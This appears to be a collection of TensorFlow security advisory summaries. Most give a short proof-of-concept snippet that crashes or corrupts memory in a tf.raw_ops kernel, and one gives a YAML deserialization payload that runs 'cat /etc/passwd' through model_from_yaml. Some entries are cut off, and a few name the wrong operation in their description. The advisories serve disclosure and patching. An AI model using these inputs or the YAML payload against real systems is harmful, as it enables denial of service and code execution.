The implementation of tf.raw_ops.StringNGrams is vulnerable to an integer overflow issue caused by converting a signed integer value to an unsigned one and then allocating memory based on this value. import tensorflow as tf tf.raw_ops.StringNGrams( data=['',''], data_splits=[0,2], separator=' '*100, ngram_widths=[-80,0,0,-60], left_pad=' ', right_pad=' ', pad_width=100, preserve_short_sequences=False)

Arbitrary code execution due to YAML deserialization

TensorFlow and Keras can be tricked to perform arbitrary code execution when deserializing a Keras model from YAML format. from tensorflow.keras import models payload = ''' !!python/object/new:type args: ['z', !!python/tuple [], {'extend': !!python/name:exec }] listitems: "import('os').system('cat /etc/passwd')" ''' models.model_from_yaml(payload)

`std::abort` raised from `TensorListReserve`

Providing a negative element to num_elements list argument of tf.raw_ops.TensorListReserve causes the runtime to abort the process due to reallocating a std::vector to have a negative number of elements: import tensorflow as tf tf.raw_ops.TensorListReserve( element_shape = tf.constant([1]), num_elements=tf.constant([-1]), element_dtype = tf.int32)

`CHECK`-fail in `MapStage`

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.MapStage: import tensorflow as tf tf.raw_ops.MapStage( key=tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), indices=tf.constant((0), dtype=tf.int32), values=[tf.constant((0), dtype=tf.int32)], dtypes=[tf.int32, tf.int64], capacity=0, memory_limit=0, container='', shared_name='')

Exposure of Resource to Wrong Sphere

TensorFlow allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Stack overflow due to looping TFLite subgraph

TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Reference binding to nullptr in `SdcaOptimizer`

The implementation of tf.raw_ops.SdcaOptimizer triggers undefined behavior due to dereferencing a null pointer: import tensorflow as tf sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_feature_values = [] dense_features = [] dense_weights = [] example_weights = tf.constant((0.0), dtype=tf.float32) example_labels = tf.constant((0.0), dtype=tf.float32) sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], …

Reference binding to null pointer in `MatrixDiag*` ops

The implementation of MatrixDiag* operations does not validate that the tensor arguments are non-empty: num_rows = context->input(2).flat<int32>()(0); num_cols = context->input(3).flat<int32>()(0); padding_value = context->input(4).flat<T>()(0); Thus, users can trigger null pointer dereferences if any of the above tensors are null: import tensorflow as tf d = tf.convert_to_tensor([],dtype=tf.float32) p = tf.convert_to_tensor([],dtype=tf.float32) tf.raw_ops.MatrixDiagV2(diagonal=d, k=0, num_rows=0, num_cols=0, padding_value=p) Changing from tf.raw_ops.MatrixDiagV2 to tf.raw_ops.MatrixDiagV3 still reproduces the issue.

Reference binding to null in `ParameterizedTruncatedNormal`

An attacker can trigger undefined behavior by binding to null pointer in tf.raw_ops.ParameterizedTruncatedNormal: import tensorflow as tf shape = tf.constant([], shape=[0], dtype=tf.int32) means = tf.constant((1), dtype=tf.float32) stdevs = tf.constant((1), dtype=tf.float32) minvals = tf.constant((1), dtype=tf.float32) maxvals = tf.constant((1), dtype=tf.float32) tf.raw_ops.ParameterizedTruncatedNormal( shape=shape, means=means, stdevs=stdevs, minvals=minvals, maxvals=maxvals)

Overflow/denial of service in `tf.raw_ops.ReverseSequence`

The implementation of tf.raw_ops.ReverseSequence allows for stack overflow and/or CHECK-fail based denial of service. import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, batch_dim=0)

OOB read in `MatrixTriangularSolve`

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails: void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { OP_REQUIRES( ctx, in0.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims())); OP_REQUIRES( ctx, in1.dims() >= 2, errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims())); } void Compute(OpKernelContext* ctx) override { const Tensor& in0 = ctx->input(0); const Tensor& in1 = ctx->input(1); ValidateInputTensors(ctx, in0, in1); …

Null pointer dereference via invalid Ragged Tensors

Calling tf.raw_ops.RaggedTensorToVariant with arguments specifying an invalid ragged tensor results in a null pointer dereference: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1]) import tensorflow as tf input_tensor = tf.constant([], shape=[2, 2, 2, 2, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 2, …

Null pointer dereference in TFLite's `Reshape` operator

The fix for CVE-2020-15209 missed the case when the target shape of Reshape operator is given by the elements of a 1-D tensor. As such, the fix for the vulnerability allowed passing a null-buffer-backed tensor with a 1D shape: if (tensor->data.raw == nullptr && tensor->bytes > 0) { if (registration.builtin_code == kTfLiteBuiltinReshape && i == 1) { // In general, having a tensor here with no buffer will be an …

Null pointer dereference in `StringNGrams`

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams: import tensorflow as tf data=tf.constant([''] * 11, shape=[11], dtype=tf.string) splits = [0]*115 splits.append(3) data_splits=tf.constant(splits, shape=[116], dtype=tf.int64) tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss', ngram_widths=[7,6,11], left_pad='ABCDE', right_pad=b'ZYXWVU', pad_width=50, preserve_short_sequences=True)

Null pointer dereference in `SparseFillEmptyRows`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.SparseFillEmptyRows: import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) dense_shape = tf.constant([], shape=[0], dtype=tf.int64) default_value = 0 tf.raw_ops.SparseFillEmptyRows( indices=indices, values=values, dense_shape=dense_shape, default_value=default_value)

Null pointer dereference in `EditDistance`

An attacker can trigger a null pointer dereference in the implementation of tf.raw_ops.EditDistance: import tensorflow as tf hypothesis_indices = tf.constant([247, 247, 247], shape=[1, 3], dtype=tf.int64) hypothesis_values = tf.constant([-9.9999], shape=[1], dtype=tf.float32) hypothesis_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) truth_indices = tf.constant([], shape=[0, 3], dtype=tf.int64) truth_values = tf.constant([], shape=[0], dtype=tf.float32) truth_shape = tf.constant([0, 0, 0], shape=[3], dtype=tf.int64) tf.raw_ops.EditDistance( hypothesis_indices=hypothesis_indices, hypothesis_values=hypothesis_values, hypothesis_shape=hypothesis_shape, truth_indices=truth_indices, truth_values=truth_values, truth_shape=truth_shape, normalize=True)

Memory corruption in `DrawBoundingBoxesV2`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors)

Lack of validation in `SparseDenseCwiseMul`

Due to lack of validation in tf.raw_ops.SparseDenseCwiseMul, an attacker can trigger denial of service via CHECK-fails or accesses to outside the bounds of heap allocated data: import tensorflow as tf indices = tf.constant([], shape=[10, 0], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) shape = tf.constant([0, 0], shape=[2], dtype=tf.int64) dense = tf.constant([], shape=[0], dtype=tf.int64) tf.raw_ops.SparseDenseCwiseMul( sp_indices=indices, sp_values=values, sp_shape=shape, dense=dense)

Invalid validation in `SparseMatrixSparseCholesky`

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape = [1, 1] st = tf.SparseTensor(indices_array, value_array, dense_shape) input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape) permutation = tf.constant([], shape=[1, 0], dtype=tf.int32) tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

Invalid validation in `QuantizeAndDequantizeV2`

The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument: import tensorflow as tf input_tensor = tf.constant([0.0], shape=[1], dtype=float) input_min = tf.constant(-10.0) input_max = tf.constant(-10.0) tf.raw_ops.QuantizeAndDequantizeV2( input=input_tensor, input_min=input_min, input_max=input_max, signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN', narrow_range=False, axis=-2)

Integer overflow in TFLite memory allocation

The TFLite code for allocating TFLiteIntArrays is vulnerable to an integer overflow issue: int TfLiteIntArrayGetSizeInBytes(int size) { static TfLiteIntArray dummy; return sizeof(dummy) + sizeof(dummy.data[0]) * size; } An attacker can craft a model such that the size multiplier is so large that the return value overflows the int datatype and becomes negative. In turn, this results in invalid value being given to malloc: TfLiteIntArray* TfLiteIntArrayCreate(int size) { TfLiteIntArray* ret = …

Integer overflow in TFLite concatentation

The TFLite implementation of concatenation is vulnerable to an integer overflow issue: for (int d = 0; d < t0->dims->size; ++d) { if (d == axis) { sum_axis += t->dims->data[axis]; } else { TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]); } } An attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of int. TFLite uses int to represent tensor dimensions, whereas TF uses int64. …

Incomplete validation in `tf.raw_ops.CTCLoss`

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …

Incomplete validation in `SparseReshape`

Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)

Incomplete validation in `SparseAdd`

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)

Heap out of bounds write in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)

Heap out of bounds read in `RequantizationRange`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)

Heap out of bounds read in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …

Heap OOB write in TFLite

A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …

Heap OOB read in TFLite

A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }

Heap OOB read in `tf.raw_ops.Dequantize`

Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …

Heap OOB in `QuantizeAndDequantizeV3`

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)

Heap OOB and null pointer dereference in `RaggedTensorToTensor`

Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)

Heap OOB access in unicode ops

An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)

Heap OOB access in `Dilation2DBackpropInput`

An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')

Heap buffer overflow in `StringNGrams`

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `SparseTensorToCSRSparseMatrix`

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)

Heap buffer overflow in `SparseSplit`

An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)

Heap buffer overflow in `RaggedTensorToTensor`

An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …

Heap buffer overflow in `RaggedBinCount`

If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

